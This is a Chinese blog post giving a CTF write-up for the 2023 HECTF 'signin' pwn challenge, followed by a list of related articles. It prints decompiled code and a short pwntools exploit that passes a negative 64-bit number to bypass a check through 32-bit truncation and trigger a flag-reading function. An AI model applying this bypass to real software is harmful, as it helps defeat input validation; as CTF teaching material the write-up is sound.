2023 第七届 HECTF 信息安全挑战赛signin

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量106 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dangwobucunzai/article/details/134561449
版权

分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4[2]; // [rsp+0h] [rbp-10h] BYREF

  v4[1] = __readfsqword(0x28u);
  put(argc, argv, envp);
  __isoc99_scanf("%ld", v4);
  if ( v4[0] > 3 )
    exit(-1);
  if ( LODWORD(v4[0]) == B )
    b4ckdo0r();
  return 0;
}

unsigned __int64 b4ckdo0r()
{
  char *argv[5]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  argv[0] = "/bin/cat";
  argv[1] = "flag";
  argv[2] = 0LL;
  execve("/bin/cat", argv, 0LL);
  return v2 - __readfsqword(0x28u);
}

本题主要是要让程序执行到b4ckdo0r函数,但是需要在函数中满足输入的数值大于3和等于0x42
此题关键点在LODWORD(v4[0]),主要是LODWORD(**LODWORD 是一个在编程中用来从更大的整数类型中提取低位部分(低阶双字)的宏或函数。LODWORD 通常用于从 64 位整数(如 long long__int64)中提取低 32 位,以得到一个 DWORD(即 unsigned long)类型的值。),我们输入的是64位的数据,比对需要小于3的时候使用的是64位的数据,但是在比对是否位0x42时,使用的是低32位的数据

解题

思路

将输入的数据设置为负数(满足第一个判断),但是被截取为32位时候要等于0x42(满足第二个判断),比如输入数值为-4294967230,对应的补码(在系统里面负数使用补码表示)为:FFFF FFFF 0000 0042,64位时,第一位为符号位,此处第一位是1,即为负数,截取为32位时,只剩下0000 0042,等于0x42,即可进入到执行b4ckdo0r函数

payload

from pwn import *
sh=process('./pwn')
#sh=remote('101.133.164.228',32295)
sh.recv()
sh.send(b'-4294967230'+b'\n') #此处是payload
sh.recv()
a=sh.recv()
print(a)
江上一尘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023年软考信息安全工程师考试备考指南
鹿鸣天涯
09-08 5645
信息安全工程师是信息产业部和人事部举办的软考中新增开的一门考试。软考全称全国计算机技术与软件专业技术资格(水平)考试,这门新开的信息安全工程师分属该考试“信息系统”专业,位处中级资格,是信息产业部和人事部在最新的“国人厅发[2007]139号文件中新增的专业。2016年下半年,第一次开考信息安全工程师(中级)考试。 考试科目: 1.信息安全基础知识,考试时间为150分钟,笔试,选择题; ...
苹果手机signin_iPhone手机弹出sign in to itunes store怎么办[图]
weixin_33331559的博客
12-23 3050
iPhone手机弹出sign in to itunes store怎么办?想必有的亲们遇到了这种问题,那么是不是骗子呢?下面就由安族小编为您详细介绍介绍哦。iPhone弹出sign in to itunes store怎么办容易模仿的弹出框iPhone和iPad用户已经习惯了苹果官方弹窗,之后在其中输入Apple ID和密码,这种弹窗不一定会出现在App Store或iTunes应用程序中。采用U...
攻防世界 reverse新手题 getit
空舟的博客
08-02 1110
getit 查看一下,ELF文件,64位 拉入64位ida,找到main函数,F5查看伪代码 v9 = __readfsqword(0x28u); LODWORD(v5) = 0; while ( (signed int)v5 < strlen(s) ) { if ( v5 & 1 ) v3 = 1; else v3 = -1; *(&t + (signed int)v5 + 10) = s[(signed int)v5] +
2023 第七届 HECTF 信息安全挑战赛ezest
dangwobucunzai的博客
11-22 94
SROP 攻击利用 rt_sigreturn 来控制程序的执行流程。这种攻击的关键在于构造一个伪造的信号帧(包含寄存器的状态),然后通过程序中的漏洞(如栈溢出)引导程序执行 rt_sigreturn,从而使操作系统恢复这个伪造的信号帧。
【wp】2023第七届HECTF信息安全挑战赛 Web
m0_63138919的博客
11-19 647
本文为【wp】2023第七届HECTF信息安全挑战赛 Web
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN)
Welcome To Myon'Blog !
05-27 1770
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
2023全国大学生 信息安全竞赛创新实践能力赛
weixin_44807430的博客
05-28 1071
2023全国信息安全竞赛wp
苹果手机signin_苹果iphone弹出sign in to itunes store怎么办
weixin_28898707的博客
12-23 5436
苹果iphone弹出sign in to itunes store怎么办?容易模仿的弹出框iPhone和iPad用户已经习惯了苹果官方弹窗,之后在其中输入Apple ID和密码,这种弹窗不一定会出现在App Store或iTunes应用程序中。采用UIAlertController模拟系统密码请求弹窗的设计样式,第三方App开发者可以创建一个完全相同的弹窗用作钓鱼工具,可能很多人会上当。这只是一次...
2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup
Le1a's Blog
11-01 9140
2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛Writeup Misc checkin 题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flag flag为: flag{dhb_7th} project 下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip 解压得到你来了~ 这里面一共有三段数据,第一段是base64编码 6KGo5oOF5YyF5paH5YyW77y
2023年第十六届全国大学生信息安全竞赛能力赛部分(WP)
xccwxy的博客
05-29 2266
2023年第十六届全国大学生信息安全竞赛能力赛部分(WP)
信息安全_数据安全_Randomness of Physiological Sign.pdf
08-22
信息安全_数据安全_Randomness of Physiological Sign AI 安全对抗 信息安全研究 安全运营 企业安全
Unity Google登录 Google signin Google login 可以获取 Id-Token
01-02
1、需要在后台建立web类型的凭据(credentials) ...2、firebase config ...下载 google-services.json (可以全网页搜索 google-services.json) GeneratedLocalRepo 是引用的firebase的Unity库 GoogleSignIn 文件夹里的是...
PHP后端实现苹果三方登录/signin-with-apple 授权验证
01-08
关于苹果授权,官方文档写的不仔细,但还是要看一下 https://developer.apple.com/sign-in-with-apple/get-started/ 后端验证苹果授权用户正确性有两种方式,如下: 利用 identity_token 与 user_id 进行校验,匹配...
Sign in with Apple.unitypackage
05-27
Unity 最新 苹果登录 官方插件工程 给无法去商店下载的小伙伴使用
登录安全分析报告:小米官网注册
Explinks的博客
05-29 932
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 272
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 671
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1504
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
Apple Sign In插件如何获取令牌token
07-15
要使用Apple Sign In插件获取令牌token,您需要按照以下步骤进行操作: 1. 首先,确保您已在Apple开发者中心注册并创建了一个应用程序,并且已经启用了Sign In with Apple功能。 2. 在您的应用程序中,导入Apple Sign In插件,并根据插件的文档进行设置和配置。 3. 在您的应用程序中,使用插件提供的方法调用苹果授权登录功能。这将弹出一个授权界面,用户可以选择使用Apple ID登录。 4. 用户选择登录后,您的应用程序将收到一个授权凭证,其中包含一个授权码。 5. 使用插件提供的方法,将授权凭证发送给苹果服务器验证,并获取令牌token。 请注意,具体的实现步骤可能因插件的不同而有所差异。因此,请参阅所使用的Apple Sign In插件的文档,以获取详细的设置和使用说明。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值